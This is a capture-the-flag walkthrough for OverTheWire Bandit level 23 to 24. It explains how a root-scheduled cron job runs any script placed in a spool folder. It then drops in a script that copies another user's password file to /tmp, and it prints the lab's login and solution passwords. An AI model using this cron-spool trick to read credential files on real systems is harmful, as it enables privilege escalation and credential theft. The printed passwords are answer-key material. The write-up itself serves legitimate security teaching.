OverTheWire - Bandit - Level 23 → Level 24

Warning: This post contains a solution!

Only continue if:
1.) you want to see a possible alternative solution or
2.) you are stuck and need a hint!


Connect to the server using the following credentials:

Server: bandit.labs.overthewire.org
Port: 2220
Username: bandit23
Password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Level Goal is:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Check the content of the folder /etc/cron.d/:

bandit23@bandit:~$ ls /etc/cron.d/
cronjob_bandit22  cronjob_bandit23  cronjob_bandit24

There are three files, the third one (cronjob_bandit24) is the interesting one for the current level. Take a look at the content:

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

A script (/usr/bin/cronjob_bandit24.sh) will be executed once on reboot and every minute.
Take a look at the content of the script:

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh 
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
	echo "Handling $i"
	timeout -s 9 60 ./$i
	rm -f ./$i
    fi
done


As mentioned in line seven, this script is executing all scripts available in the folder '/var/spool/$myname' '/var/spool/bandit24' in our case. After executing a script, it deletes the script (line 14).

A temporary folder to save the flag to is needed, first create it and change chmod to 777 (lazy, I know):

bandit23@bandit:~$ mkdir /tmp/lvl2324
bandit23@bandit:~$ chmod 777 /tmp/lvl2324

Now, move to that temporary directory and create a short shell script, which writes the output of '/etc/bandit_pass/bandit24' to '/tmp/lvl2324/password':

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/lvl2324/password

Copy that shell script file to '/var/spool/bandit24':

bandit23@bandit:/tmp/lvl2324$ cp script.sh /var/spool/bandit24/

Wait until the shell script file in the folder is deleted and check the password file:

bandit23@bandit:/tmp/lvl2324$ cat password 
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

The password is: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Don't forget to delete the temporary folder:

bandit23@bandit:~$ rm -rf /tmp/lvl2324
Show Comments